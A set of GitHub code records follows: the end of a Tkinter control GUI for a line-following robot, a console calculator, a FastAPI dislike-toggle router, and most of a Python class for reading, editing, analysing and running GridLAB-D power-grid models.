perform the corresponding action\n            pass\n\n\n    # Bind the \"Nitros\" button text to the nitros_button_action function\n    canvas.tag_bind(nitros_button_text_item, '<Button-1>', lambda event: nitros_button_action())\n\n    # Define the Crawl button function\n    def crawl_button_action():\n        global crawl_on_status # Make sure to use the global variable\n        crawl_on_status = not crawl_on_status # Toggle the status\n        # Implement the logic to send commands or perform actions based on crawl_on_status\n        if crawl_on_status:\n            # If crawl_on_status is True, perform the corresponding action\n            pass\n        else:\n            # If crawl_on_status is False, perform the corresponding action\n            pass\n\n\n    # Bind the \"Crawl\" button text to the crawl_button_action function\n    canvas.tag_bind(crawl_button_text_item, '<Button-1>', lambda event: crawl_button_action())\n\n\n    # Function to handle manual control state\n    def handle_manual_control():\n        global w_status, a_status, s_status, d_status\n        if manual_control_toggle_var.get():\n            # Manual control is enabled\n\n            def on_key_press(event):\n                global w_status, a_status, s_status, d_status\n                key = event.keysym\n                if key == \"w\":\n                    # Handle the \"W\" key press (move the car forward)\n                    w_status = True\n                elif key == \"a\":\n                    # Handle the \"A\" key press (move the car left)\n                    a_status = True\n                elif key == \"s\":\n                    # Handle the \"S\" key press (move the car backward)\n                    s_status = True\n                elif key == \"d\":\n                    # Handle the \"D\" key press (move the car right)\n                    d_status = True\n\n            # Bind key presses to the on_key_press function\n            root.bind(\"<KeyPress>\", on_key_press)\n\n            def on_key_release(event):\n                global w_status, a_status, s_status, d_status\n                key = event.keysym\n                if key == \"w\":\n                    w_status = False\n                elif key == \"a\":\n                    a_status = False\n                elif key == \"s\":\n                    s_status = False\n                elif key == \"d\":\n                    d_status = False\n\n            # Bind key releases to the on_key_release 
function\n            root.bind(\"<KeyRelease>\", on_key_release)\n\n\n    handle_manual_control()\n\n    global w_status, a_status, s_status, d_status\n\n    data_to_write = {\n        \"start_toggle_status\": start_toggle_var.get(), # Get the status of the Start toggle\n        \"emergency_stop_status\": emergency_stop_status,\n        \"nitros_on_status\": nitros_on_status,\n        \"crawl_on_status\": crawl_on_status,\n        \"threshold_value\": slider.get(), # Get the value from the slider\n        \"manual_toggle_status\": manual_control_toggle_var.get(), # Get the status of the Manual Control toggle\n        \"duty_cycle_slider_value\": vertical_slider.get(), # Get the value from the duty cycle slider\n        \"w_status\": w_status,\n        \"a_status\": a_status,\n        \"s_status\": s_status,\n        \"d_status\": d_status\n    }\n\n    json_file_path = 'to_firm.json' # Update this with the actual file path\n\n    # Write the data to the JSON file\n    with open(json_file_path, 'w') as json_file:\n        json.dump(data_to_write, json_file, indent=4) # The 'indent' argument is optional and provides pretty-printing\n\n\n    # Update the colors of the Nitros, Crawl, and Emergency Stop buttons based on their status\n    if nitros_on_status:\n        canvas.itemconfig(nitros_button_text_item, fill=\"#42FE65\") # Change color to green when Nitros is on\n    else:\n        canvas.itemconfig(nitros_button_text_item, fill=\"#00386B\") # Change color back to the original color\n\n    if crawl_on_status:\n        canvas.itemconfig(crawl_button_text_item, fill=\"#42FE65\") # Change color to green when Crawl is on\n    else:\n        canvas.itemconfig(crawl_button_text_item, fill=\"#804500\") # Change color back to the original color\n\n    if emergency_stop_status:\n        canvas.itemconfig(emergency_stop_text_item, fill=\"#FEA842\") # Change color to orange when Emergency Stop is on\n    else:\n        canvas.itemconfig(emergency_stop_text_item, fill=\"#A60000\") # Change color back to the original color\n\n\n    update_gauge(data_to_write[\"duty_cycle_slider_value\"])\n\n\nupdate_gui()\n# Start the GUI\nroot.mainloop()\n","repo_name":"amiiboii/Line-following-robot-DAC-linear-ramp-comparator-setup.","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":21338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35914492016","text":"while True:\n    #define addition operation\n    def add():\n        print(\"\\033[1;32m ` \\n\")\n        #try to run the numbers in the code if the type is correct\n        try:\n            #ask user for the first number\n            number_1_input = float(input(\"What is the first number? \"))\n            #ask the user for the second number\n            number_2_input = float(input(\"What is your second number? \"))\n            number_output = number_1_input + number_2_input\n            print(\"\\n\" + str(number_output) + \"\\n\")\n        except ValueError:\n            print(\"That is a string please input an integer\")\n    #\n    #define subtraction operation\n    def subtract():\n        print(\"\\033[1;32m ` \\n\")\n        #try to run the numbers in the code if the type is correct\n        try:\n            #ask user for the first number\n            number_1_input = float(input(\"What is your first number? \"))\n            #ask the user for the second number\n            number_2_input = float(input(\"What is your second number? \"))\n            number_output = number_1_input - number_2_input\n            print(\"\\n\" + str(number_output) + \"\\n\")\n        except ValueError:\n            print(\"That is a string please input an integer\")\n    #\n    #define multiplication operation\n    def multiply():\n        print(\"\\033[1;32m ` \\n\")\n        #try to run the numbers in the code if the type is correct\n        try:\n            #ask user for the first number\n            number_1_input = float(input(\"What is your first number? 
\"))\n            #ask the user for the second number\n            number_2_input = float(input(\"What is your second number? \"))\n            number_output = number_1_input * number_2_input\n            print(\"\\n\" + str(number_output) + \"\\n\")\n        except ValueError:\n            print(\"That is a string please input an integer\")\n    #\n    #define division operation\n    def divide():\n        print(\"\\033[1;32m ` \\n\")\n        #try to run the numbers in the code if the type is correct and if it will be a zero division error\n        try:\n            #ask user for the first number\n            number_1_input = float(input(\"What is your first number? \"))\n            #ask the user for the second number\n            number_2_input = float(input(\"What is your second number? \"))\n            number_output = number_1_input / number_2_input\n            print(\"\\n\" + str(number_output) + \"\\n\")\n        except ValueError:\n            print(\"That is a string please input an integer\")\n        except ZeroDivisionError:\n            print(\"The number is being divided by a zero\")\n\n    addition_input_list = [\"add\", \"Add\", \"ADD\", \"addition\", \"Addition\", \"ADDITION\"]\n    subtraction_input_list = [\"minus\", \"Minus\", \"MINUS\", \"subtract\", \"Subtraction\", \"SUBTRACTION\"]\n    division_input_list = [\"divide\", \"Divide\", \"DIVIDE\", \"division\", \"Division\", \"DIVISION\"]\n    multiplication_input_list = [\"multiply\", \"Multiply\", \"MULTIPLY\", \"multiplication\", \"Multiplication\", \"MULTIPLICATION\"]\n\n    #Ask user on what Operation to do\n    print(\"\\033[1;32m ` \\n\")\n    print(\"Welcome to my Calculator na pinacomplicated\\n\\nIkaw ba ay mag:\\n\\nAddition\\nSubtraction\\nMultiplication\\nDivision\\n\")\n    operation_user_input = str(input(\"What Operation would you like to use?: \"))\n\n    if operation_user_input in addition_input_list:\n        add()\n    elif operation_user_input in subtraction_input_list:\n        subtract()\n    elif operation_user_input in multiplication_input_list:\n        multiply()\n    elif operation_user_input in division_input_list:\n        divide()\n    else:\n        print(\"Please input the right operation :)\")\n    try_again = input(\"Would you like to calculate again?: \")\n    print(\"\\n\")\n    yes_user_input = [\"Y\", \"y\", \"Yes\", \"YES\"]\n    no_user_input = [\"N\", \"n\", \"No\", \"NO\"]\n    if try_again in yes_user_input:\n        continue\n    elif try_again in no_user_input:\n        break","repo_name":"MoonHunter99/Calculator-with-error-handling","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38298313358","text":"from typing import List, Union, Dict\nfrom fastapi import Header, APIRouter, HTTPException\n\nfrom reactions.api.models import LikeIn, LikeOut, DislikeIn, DislikeOut\nfrom reactions.api.db_manager import dislikes as db_dislikes\n\nfrom fastapi import Depends\nimport requests\n\ndislikes = APIRouter()\n# verify_video_owner\n\n\n@dislikes.get(\n    \"/dislikes-by-video\",\n    response_model=List[DislikeOut],\n    summary=\"All Dislikes by videos\",\n)\nasync def index(video_id: int):\n    return await db_dislikes.get_all_dislikes_by_video(video_id)\n\n\n@dislikes.post(\n    \"/add-remove-likes\",\n    response_model=Union[DislikeOut, None],\n    summary=\"Toggle dislike button and remove like\",\n    status_code=201,\n)\nasync def add_remove_dislike(id: int, user=Depends(db_dislikes.get_current_user)):\n    return await db_dislikes.add_remove_dislike(id, 
user)\n","repo_name":"omariut/YT_video_share_library","sub_path":"reactions/api/routers/dislikes.py","file_name":"dislikes.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16125165296","text":"import warnings\nfrom glmpy import glmanip, graph\nimport shutil\nimport subprocess\nfrom pathlib import Path\nimport pandas as pd\nimport numpy as np\nimport os\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom networkx.drawing.nx_agraph import graphviz_layout\nfrom copy import deepcopy, copy\n\n_link_types = [\n 'link', 'overhead_line', 'underground_line', 'triplex_line', 'transformer',\n 'regulator', 'fuse', 'switch', 'recloser', 'relay', 'sectionalizer', 'series_reactor'\n]\n_node_types = ['meter', 'node', 'triplex_node', 'triplex_meter', 'load', 'pqload', 'capacitor', 'recorder',\n 'inverter', 'diesel_dg']\n\n\nclass Gridlabd:\n def __init__(self, file_path=None, base_dir_path=None):\n \"\"\"\n\n Parameters\n ----------\n file_path\n base_dir_path\n \"\"\"\n\n self.model = {}\n self.clock = {}\n self.directives = {}\n self.modules = {}\n self.classes = {}\n self.schedules = {}\n self.file_path = file_path\n self.base_dir_path = base_dir_path\n if file_path is not None:\n self.file_path = Path(file_path)\n if self.base_dir_path is None:\n self.base_dir_path = self.file_path.parent\n self.base_dir_path = Path(self.base_dir_path)\n self.read(self.file_path, self.base_dir_path)\n\n def read(self, file_path, base_dir):\n \"\"\"\n\n Parameters\n ----------\n file_path: str or Path -- path of glm file\n base_dir: str or Path -- path of model base directory,\n\n Returns\n -------\n\n \"\"\"\n self.model, self.clock, self.directives, self.modules, self.classes, self.schedules = \\\n glmanip.parse(glmanip.read(file_path, base_dir))\n\n def write(self, filename):\n glmanip.write(filename, self.model, self.clock, self.directives, self.modules, self.classes, self.schedules)\n\n def swing_nodes(self):\n return self.find_objects_with_property_value('bustype', 'SWING', search_types=['meter', 'node'],\n prepend_class=False)\n\n def find_objects_with_property_value(\n self, obj_property: str, value: str, search_types: list = None, prepend_class=False):\n \"\"\"\n\n Parameters\n ----------\n obj_property: str\n value: str -- value of property\n search_types: list -- optional list of types to search for the object in\n prepend_class: bool -- if true, returned object names will be prepended with the object type e.g. node:node_1\n\n Returns\n -------\n list of object names which have the property with the given value\n\n \"\"\"\n if search_types is None:\n search_types = self.model.keys()\n obj_list = []\n for obj_type in search_types:\n if obj_type in self.model.keys():\n for obj_name in self.model.get(obj_type):\n if self.model[obj_type][obj_name].get(obj_property) == value:\n if prepend_class:\n obj_list.append(obj_type.strip(\"\\'\").strip(\"\\\"\") + ':' + obj_name.strip(\"\\'\").strip(\"\\\"\"))\n else:\n obj_list.append(obj_name)\n return obj_list\n\n def get_object_type(self, obj_name: str, search_types: list = None):\n \"\"\"\n\n Parameters\n ----------\n obj_name: str -- object name\n search_types: list -- optional list of types to search for the object in\n\n Returns\n -------\n name of the class that the object belongs to\n \"\"\"\n if len(obj_name.split(\":\")) == 2: # support receiving obj_name in the form class:obj_name e.g. 
\"meter:node_2\"\n class_name = obj_name.split(\":\")[0]\n return class_name\n if search_types is None:\n search_types = self.model.keys()\n for class_name in search_types:\n if class_name in self.model.keys():\n if obj_name in self.model[class_name].keys():\n return class_name\n raise Warning(\"Did not find object class\")\n\n def get_object_property_value(self, obj_name: str, obj_property: str, search_types: list = None):\n \"\"\"\n\n Parameters\n ----------\n obj_name: str -- object name\n obj_property: str -- property to get the value of\n search_types: list -- optional list of types to search for the object in\n\n Returns\n -------\n value of property of the object\n \"\"\"\n if len(obj_name.split(\":\")) == 2: # support receiving obj_name in the form class:obj_name e.g. \"meter:node_2\"\n obj_class = obj_name.split(\":\")[0]\n obj_name = obj_name.split(\":\")[-1]\n else:\n obj_class = self.get_object_type(obj_name, search_types=search_types)\n if self.model[obj_class].get(obj_name) is None:\n return self.model[obj_class].get('\\\"' + obj_name + '\\\"').get(obj_property)\n return self.model[obj_class][obj_name].get(obj_property)\n\n def get_parent(self, obj_name: str, obj_type: str):\n \"\"\"\n get parent of object\n Parameters\n ----------\n obj_name: str -- name of object\n obj_type: str -- type of object\n\n Returns\n -------\n parent_name: str\n parent_type: str\n \"\"\"\n # 1. get name of parent\n parent_name = self.model[obj_type][obj_name].get('parent')\n # 2. get type of parent\n parent_type = None\n if parent_name is not None:\n parent_type = self.get_object_type(parent_name)\n return parent_name, parent_type\n\n def get_final_parent(self, obj_name: str, obj_type: str):\n \"\"\"\n get ultimate parent of object\n Parameters\n ----------\n obj_name: str -- name of object\n obj_type: str -- type of object\n\n Returns\n -------\n parent_name: str\n parent_type: str\n \"\"\"\n parent_name, parent_type = self.get_parent(obj_name, obj_type)\n if parent_type is not None:\n if self.model[parent_type][parent_name].get('parent') is None:\n return parent_name, parent_type\n else:\n return self.get_final_parent(parent_name, parent_type)\n\n def model_from_comp(self, comp: set):\n model = {}\n for obj_name in comp:\n if len(obj_name.split(\n \":\")) == 2: # support receiving obj_name in the form class:obj_name e.g. \"meter:node_2\"\n obj_class = obj_name.split(\":\")[0]\n obj_name = obj_name.split(\":\")[-1]\n else:\n obj_class = self.get_object_type(obj_name)\n # add to model\n if model.get(obj_class) is None:\n model[obj_class] = {}\n if model[obj_class].get(obj_name) is not None:\n warnings.warn(f'Overwriting object, {obj_name}!')\n model[obj_class][obj_name] = self.get(obj_name, obj_class)\n # Find all references to the node:\n\n return model\n\n def get_all(self, obj_names: list):\n model = {}\n for obj_name in obj_names:\n if len(obj_name.split(\n \":\")) == 2: # support receiving obj_name in the form class:obj_name e.g. 
\"meter:node_2\"\n obj_class = obj_name.split(\":\")[0]\n obj_name = obj_name.split(\":\")[-1]\n else:\n obj_class = self.get_object_type(obj_name)\n # add to model\n if model.get(obj_class) is None:\n model[obj_class] = {}\n if model[obj_class].get(obj_name) is not None:\n warnings.warn(f'Overwriting object, {obj_name}!')\n model[obj_class][obj_name] = self.get(obj_name, obj_class)\n return model\n\n def get(self, obj_name: str, obj_class=None):\n \"\"\"\n Parameters\n ----------\n obj_name: str -- object name\n obj_class: str -- optional class of object\n\n Returns\n -------\n object dictionary\n \"\"\"\n if len(obj_name.split(\":\")) == 2: # support receiving obj_name in the form class:obj_name e.g. \"meter:node_2\"\n obj_class = obj_name.split(\":\")[0]\n obj_name = obj_name.split(\":\")[-1]\n elif obj_class is None:\n obj_class = self.get_object_type(obj_name)\n if self.model[obj_class].get(obj_name) is None:\n return self.model[obj_class].get('\\\"' + obj_name + '\\\"')\n return self.model[obj_class][obj_name]\n\n def run(self, tmp_model_path=None, file_names_to_read=None):\n \"\"\"\n Run the model in a temporary directory and read the result files into data frames.\n Parameters\n ----------\n tmp_model_path: str or Path -- directory where temporary directory will be created to store model and outputs\n file_names_to_read: list -- list of names of output files to read\n\n Returns\n -------\n dictionary of results as pandas dataframes\n \"\"\"\n\n # 1. Create temporary directory for storing and running the model\n if tmp_model_path is None:\n if self.base_dir_path is None:\n raise RuntimeError(\"No path is provided to add temporary directory to. Either provide, tmp_model_path \"\n \"or define parameter, base_dir_path\")\n tmp_model_path = self.base_dir_path\n tmp_dir = Path(tmp_model_path) / 'gld_tmp'\n if tmp_dir.exists():\n shutil.rmtree(tmp_dir) # remove old temporary directory\n tmp_dir.mkdir()\n output_name = tmp_dir / 'system.glm'\n # 2. Check for players and copy player files\n if self.model.get('player') is not None:\n player_dir = tmp_dir / 'players'\n player_dir.mkdir()\n for player_name in self.model['player'].keys():\n if self.model['player'][player_name].get('file') is not None:\n old_path_name = (tmp_model_path / Path(self.model['player'][player_name].get('file'))).absolute()\n shutil.copy(old_path_name, player_dir/old_path_name.name)\n self.model['player'][player_name]['file'] = str(Path('players/'+old_path_name.name))\n # 3. Create subdirectory for output files to go to.\n out_dir = tmp_dir / 'output'\n out_dir.mkdir()\n self.change_output_dirs('output')\n\n # 4. Write glm file\n self.write(output_name)\n # 5. Run glm file\n # self.run_gld_on_subprocess(output_name.name, tmp_dir)\n subprocess.run([\"gridlabd\", output_name.name], env=os.environ, cwd=tmp_dir)\n # 6. 
Read results\n results = {}\n if file_names_to_read is None:\n for file in list(out_dir.glob('*.csv')):\n results[Path(file).name] = self.read_csv(file)\n else:\n for file in file_names_to_read:\n file = Path('output')/file\n results[Path(file).name] = self.read_csv(file)\n return results\n\n def total_load(self):\n minus30 = np.exp(-1j*np.pi/6) # -30 deg\n minus120 = np.exp(-1j*np.pi*2/3) # -120 deg\n delta_to_wye = minus30/np.sqrt(3) * np.array(\n [\n [1, 0, -1*minus120],\n [-1*minus120, 1, 0],\n [0, -1*minus120, 1]\n ]\n )\n s_wye_tot = np.zeros(3, dtype=complex)\n s_del_tot = np.zeros(3, dtype=complex)\n # parse loads as constant p and q loads on each phase using nominal voltage\n for load_name, load in self.model['load'].items():\n v_nom = float(load.get('nominal_voltage'))\n v = np.zeros(3, dtype=complex)\n v[0] = v_nom * (minus120 ** 0)\n v[1] = v_nom * (minus120 ** 1)\n v[2] = v_nom * (minus120 ** 2)\n v_delta = np.sqrt(3)*v*np.exp(1j*np.pi/6)\n s_wye = np.zeros(3, dtype=complex)\n s_delta = np.zeros(3, dtype=complex)\n # Add all types of loads assuming nominal balanced voltages\n\n for i, ph in enumerate('ABC'):\n # Constant PQ WYE connected load:\n s_wye[i] += complex(load.get(f'constant_power_{ph}', complex(0)))\n s_wye[i] += complex(load.get(f'constant_power_{ph}N', complex(0)))\n # Constant current WYE connected load:\n s_wye[i] += v[i]*np.conjugate(complex(load.get(f'constant_current_{ph}', complex(0))))\n s_wye[i] += v[i]*np.conjugate(complex(load.get(f'constant_current_{ph}N', complex(0))))\n # Constant impedance WYE connected load\n if f'constant_impedance_{ph}' in load.keys():\n s_wye[i] += (v[i])**2 / complex(load.get(f'constant_impedance_{ph}', complex(0)))\n if f'constant_impedance_{ph}N' in load.keys():\n s_wye[i] += (v[i])**2 / complex(load.get(f'constant_impedance_{ph}N', complex(0)))\n # ZIP Loads\n if f'base_power_{ph}' in load.keys():\n base_power = float(load.get(f'base_power_{ph}'))\n power_pf = float(load.get(f'power_pf_{ph}', 1))\n current_pf = float(load.get(f'current_pf_{ph}', 1))\n impedance_pf = float(load.get(f'impedance_pf_{ph}', 1))\n power_fraction = float(load.get(f'power_fraction_{ph}', 1))\n current_fraction = float(load.get(f'current_fraction_{ph}', 0))\n impedance_fraction = float(load.get(f'impedance_fraction_{ph}', 0))\n p = base_power * (power_fraction * power_pf +\n current_fraction * current_pf +\n impedance_fraction * impedance_pf)\n q = base_power * (power_fraction * np.sin(np.arccos(power_pf)) +\n current_fraction * np.sin(np.arccos(current_pf)) +\n impedance_fraction * np.sin(np.arccos(impedance_pf)))\n s_wye[i] += p + 1j*q\n for i, ph in enumerate(['AB', 'BC', 'CA']):\n # Constant PQ delta connected load:\n s_delta[i] = complex(load.get(f'constant_power_{ph}', complex(0)))\n # Constant current WYE connected load:\n s_delta[i] += v_delta[i]*np.conjugate(complex(load.get(f'constant_current_{ph}', complex(0))))\n # Constant impedance WYE connected load\n if f'constant_impedance_{ph}' in load.keys():\n s_delta[i] += (v_delta[i])**2 / complex(load.get(f'constant_impedance_{ph}', complex(1)))\n # print(f'{load_name}:')\n s_wye_tot += s_wye\n s_del_tot += s_delta\n s_tot = s_wye_tot + delta_to_wye @ s_del_tot\n print(f'Total Load per phase:\\n'\n f'{s_tot}')\n print(f'Total Load:\\n'\n f'{sum(s_tot)}')\n return s_tot\n\n def analyze_loads(self):\n simplified_loads = []\n minus30 = np.exp(-1j*np.pi/6) # -30 deg\n minus120 = np.exp(-1j*np.pi*2/3) # -120 deg\n delta_to_wye = minus30/np.sqrt(3) * np.array(\n [\n [1, 0, -1*minus120],\n 
[-1*minus120, 1, 0],\n [0, -1*minus120, 1]\n ]\n )\n s_wye_tot = np.zeros(3, dtype=complex)\n s_del_tot = np.zeros(3, dtype=complex)\n # parse loads as constant p and q loads on each phase using nominal voltage\n for load_name, load in self.model['load'].items():\n v_nom = float(load.get('nominal_voltage'))\n v = np.zeros(3, dtype=complex)\n v[0] = v_nom * (minus120 ** 0)\n v[1] = v_nom * (minus120 ** 1)\n v[2] = v_nom * (minus120 ** 2)\n v_delta = np.sqrt(3)*v*np.exp(1j*np.pi/6)\n s_wye = np.zeros(3, dtype=complex)\n s_delta = np.zeros(3, dtype=complex)\n # Add all types of loads assuming nominal balanced voltages\n\n if 'D' not in load.get('phases'):\n for i, ph in enumerate('ABC'):\n # Constant PQ WYE connected load:\n s_wye[i] += complex(load.get(f'constant_power_{ph}', complex(0)))\n s_wye[i] += complex(load.get(f'constant_power_{ph}N', complex(0)))\n # Constant current WYE connected load:\n s_wye[i] += v[i]*np.conjugate(complex(load.get(f'constant_current_{ph}', complex(0))))\n s_wye[i] += v[i]*np.conjugate(complex(load.get(f'constant_current_{ph}N', complex(0))))\n # Constant impedance WYE connected load\n if f'constant_impedance_{ph}' in load.keys():\n s_wye[i] += \\\n np.abs(v[i])**2 / np.conjugate(complex(load.get(f'constant_impedance_{ph}', complex(0))))\n if f'constant_impedance_{ph}N' in load.keys():\n s_wye[i] += \\\n np.abs(v[i])**2 / np.conjugate(complex(load.get(f'constant_impedance_{ph}N', complex(0))))\n # ZIP Loads\n if f'base_power_{ph}' in load.keys():\n base_power = float(load.get(f'base_power_{ph}'))\n power_pf = float(load.get(f'power_pf_{ph}', 1))\n current_pf = float(load.get(f'current_pf_{ph}', 1))\n impedance_pf = float(load.get(f'impedance_pf_{ph}', 1))\n power_fraction = float(load.get(f'power_fraction_{ph}', 1))\n current_fraction = float(load.get(f'current_fraction_{ph}', 0))\n impedance_fraction = float(load.get(f'impedance_fraction_{ph}', 0))\n p = base_power * (power_fraction * power_pf +\n current_fraction * current_pf +\n impedance_fraction * impedance_pf)\n q = base_power * (power_fraction * np.sin(np.arccos(power_pf)) +\n current_fraction * np.sin(np.arccos(current_pf)) +\n impedance_fraction * np.sin(np.arccos(impedance_pf)))\n s_wye[i] += p + 1j*q\n if \"D\" in load.get('phases'):\n for i, ph in enumerate(['AB', 'BC', 'CA']):\n # Constant PQ delta connected load:\n s_delta[i] = complex(load.get(f'constant_power_{ph}', complex(0)))\n # Constant current WYE connected load:\n s_delta[i] += v_delta[i]*np.conjugate(complex(load.get(f'constant_current_{ph}', complex(0))))\n # Constant impedance WYE connected load\n if f'constant_impedance_{ph}' in load.keys():\n s_delta[i] += np.abs(v_delta[i]) ** 2 / np.conjugate(\n complex(load.get(f'constant_impedance_{ph}', complex(1))))\n\n # repeat since gridlabd reads constant_power_A as constant_power_AB when delta connected\n for i, ph in enumerate(['A', 'B', 'C']):\n # Constant PQ delta connected load:\n s_delta[i] = complex(load.get(f'constant_power_{ph}', complex(0)))\n # Constant current WYE connected load:\n s_delta[i] += v_delta[i]*np.conjugate(complex(load.get(f'constant_current_{ph}', complex(0))))\n # Constant impedance WYE connected load\n if f'constant_impedance_{ph}' in load.keys():\n s_delta[i] += np.abs(v_delta[i]) ** 2 / np.conjugate(\n complex(load.get(f'constant_impedance_{ph}', complex(1))))\n print(f'{load_name}:')\n s = s_wye + delta_to_wye @ s_delta\n print(f's: {s}\\n'\n f's_wye: {s_wye},\\n'\n f's_del: {s_delta}')\n s_wye_tot += s_wye\n s_del_tot += s_delta\n name_and_load = [load_name]\n 
name_and_load.extend(s)\n print(name_and_load)\n simplified_loads.append(name_and_load)\n s_tot = s_wye_tot + delta_to_wye @ s_del_tot\n print(f'Total Load per phase:\\n'\n f'{s_tot}')\n print(f'Total Load:\\n'\n f'{sum(s_tot)}')\n simplified_loads = pd.DataFrame(simplified_loads)\n return simplified_loads\n # ~~~~~~~~~~ Graphing convenience methods ~~~~~~~~~~~~~~~~~~~\n\n def analyze(self):\n graph.analyze(self.model)\n\n def create_graph(self, delete_open=False):\n if delete_open:\n return graph.create_graph(graph.delete_open(self.model))\n else:\n return graph.create_graph(self.model)\n\n def draw_feeders(self, feeder_swing_nodes: list = None, **options):\n return graph.draw_feeders(self.model, feeder_swing_nodes, **options)\n\n def draw(self, **options):\n return graph.draw(self.model, **options)\n # ~~~~~~~~~~ Methods for manipulating the model ~~~~~~~~~~~~~\n def rename_object(self, obj_name: str, new_obj_name: str, obj_type: str = None):\n if obj_type is None:\n obj_type = self.get_object_type(obj_name)\n\n children = self.find_objects_with_property_value('parent', obj_name, prepend_class=True)\n for child in children:\n self.get(child)['parent'] = new_obj_name\n if obj_type in _node_types:\n upstream_links = self.find_objects_with_property_value('to', obj_name, search_types=_link_types,\n prepend_class=True)\n for upstream_link in upstream_links:\n self.get(upstream_link)['to'] = new_obj_name\n downstream_links = self.find_objects_with_property_value('from', obj_name, search_types=_link_types,\n prepend_class=True)\n for downstream_link in downstream_links:\n self.get(downstream_link)['from'] = new_obj_name\n\n configurations = self.find_objects_with_property_value('configuration', obj_name, prepend_class=True)\n for configuration in configurations:\n self.get(configuration)['configuration'] = new_obj_name\n conductor_A_refs = self.find_objects_with_property_value('conductor_A', obj_name,\n search_types=['line_configuration'],\n prepend_class=True)\n for ref in conductor_A_refs:\n self.get(ref)['conductor_A'] = new_obj_name\n conductor_B_refs = self.find_objects_with_property_value('conductor_B', obj_name,\n search_types=['line_configuration'],\n prepend_class=True)\n for ref in conductor_B_refs:\n self.get(ref)['conductor_B'] = new_obj_name\n conductor_C_refs = self.find_objects_with_property_value('conductor_C', obj_name,\n search_types=['line_configuration'],\n prepend_class=True)\n for ref in conductor_C_refs:\n self.get(ref)['conductor_C'] = new_obj_name\n conductor_N_refs = self.find_objects_with_property_value('conductor_N', obj_name,\n search_types=['line_configuration'],\n prepend_class=True)\n for ref in conductor_N_refs:\n self.get(ref)['conductor_N'] = new_obj_name\n spacing_refs = self.find_objects_with_property_value('spacing', obj_name, search_types=['line_configuration'],\n prepend_class=True\n )\n for ref in spacing_refs:\n self.get(ref)['spacing'] = new_obj_name\n\n self.add_object(obj_type, new_obj_name, **self.get(obj_name))\n del self.model[obj_type][obj_name]\n\n def remove_quotes_from_obj_names(self):\n \"\"\"\n Use this to remove all quotes from object names and references. 
They aren't necessary.\n You may want to use this if quotes cause problems for processing.\n \"\"\"\n model = {}\n for obj_class, class_dict in self.model.items():\n model[obj_class] = {}\n for obj_name, obj_dict in class_dict.items():\n model[obj_class][obj_name.strip('\\\"').strip('\\'')] = obj_dict\n self.model = model\n link_types = [\n 'link', 'overhead_line', 'underground_line', 'triplex_line', 'transformer',\n 'regulator', 'fuse', 'switch', 'recloser', 'relay', 'sectionalizer', 'series_reactor'\n ]\n\n # Remove Quotes from references as well\n for link_type in link_types:\n if self.model.get(link_type) is not None:\n for link_name in self.model[link_type].keys():\n if self.model[link_type][link_name].get('from') is not None:\n self.model[link_type][link_name]['from'] = \\\n self.model[link_type][link_name]['from'].strip('\\\"').strip('\\'')\n if self.model[link_type][link_name].get('to') is not None:\n self.model[link_type][link_name]['to'] = \\\n self.model[link_type][link_name]['to'].strip('\\\"').strip('\\'')\n # clean configuration references\n if link_type in ['overhead_line', 'underground_line', 'transformer', 'regulator']:\n if self.model[link_type][link_name].get('configuration') is not None:\n self.model[link_type][link_name]['configuration'] = \\\n self.model[link_type][link_name]['configuration'].strip('\\\"').strip('\\'')\n\n node_types = ['meter', 'node', 'triplex_node', 'triplex_meter', 'load', 'pqload', 'capacitor', 'recorder',\n 'inverter', 'diesel_dg']\n for obj_type in node_types:\n if self.model.get(obj_type) is not None:\n for obj_name in self.model[obj_type].keys():\n if self.model[obj_type][obj_name].get('parent') is not None:\n self.model[obj_type][obj_name]['parent'] = \\\n self.model[obj_type][obj_name]['parent'].strip('\\\"').strip('\\'')\n # remove quotes from all line_configuration properties since they are all links to other objects.\n if self.model.get('line_configuration') is not None:\n for obj_name in self.model['line_configuration'].keys():\n for obj_property in self.model['line_configuration'][obj_name].keys():\n self.model['line_configuration'][obj_name][obj_property] = \\\n self.model['line_configuration'][obj_name][obj_property].strip('\\\"').strip('\\'')\n\n def change_output_dirs(self, new_output_dir):\n \"\"\"\n Modify all the output file paths to have the path provided.\n\n Parameters\n ----------\n new_output_dir: str or Path -- directory to send all output files to.\n \"\"\"\n # filename in voltdump, currdump, impedance_dump\n # file in recorder, collector, group_recorder\n for o_type in ['voltdump', 'currdump', 'impedance_dump']:\n if self.model.get(o_type) is not None:\n for o_name in self.model[o_type].keys():\n if self.model[o_type][o_name].get('filename') is not None:\n original_path = Path(self.model[o_type][o_name].get('filename'))\n new_path = Path(new_output_dir) / original_path.name\n self.model[o_type][o_name]['filename'] = new_path\n for o_type in ['recorder', 'collector', 'group_recorder', 'multi_recorder']:\n if self.model.get(o_type) is not None:\n for o_name in self.model[o_type].keys():\n if self.model[o_type][o_name].get('file') is not None:\n original_path = Path(self.model[o_type][o_name].get('file'))\n new_path = Path(new_output_dir) / original_path.name\n self.model[o_type][o_name]['file'] = new_path\n\n def change_player_dirs(self, new_player_dir):\n o_type = 'player'\n if self.model.get(o_type) is not None:\n for o_name in self.model[o_type].keys():\n if self.model[o_type][o_name].get('file') is not None:\n 
original_path = Path(self.model[o_type][o_name].get('file'))\n new_path = Path(new_player_dir) / original_path.name\n self.model[o_type][o_name]['file'] = new_path\n\n def add_object(self, obj_type, obj_name, **params):\n \"\"\"\n A convenience function for adding an object to the model. This will overwrite existing objects.\n\n Parameters\n ----------\n obj_type: str -- type of object\n obj_name: str -- name of object\n params: Keyword arguments become parameters of the object.\n Some property names are not allowed as keywords in Python.\n To get around this problem, pass the parameters as a dictionary with ** in front:\n add_object(obj_type, obj_name, **{'from': 'bus_3', 'to': 'bus_4', ...}).\n \"\"\"\n if self.model.get(obj_type) is None:\n self.model[obj_type] = {}\n if self.model[obj_type].get(obj_name) is not None:\n warnings.warn(f'Overwriting object, {obj_name}!')\n self.model[obj_type][obj_name] = params\n\n def add_module(self, module_name, **params):\n \"\"\"\n A convenience function for adding a module. If the module already exists it will overwrite existing parameters.\n Parameters\n ----------\n module_name: str 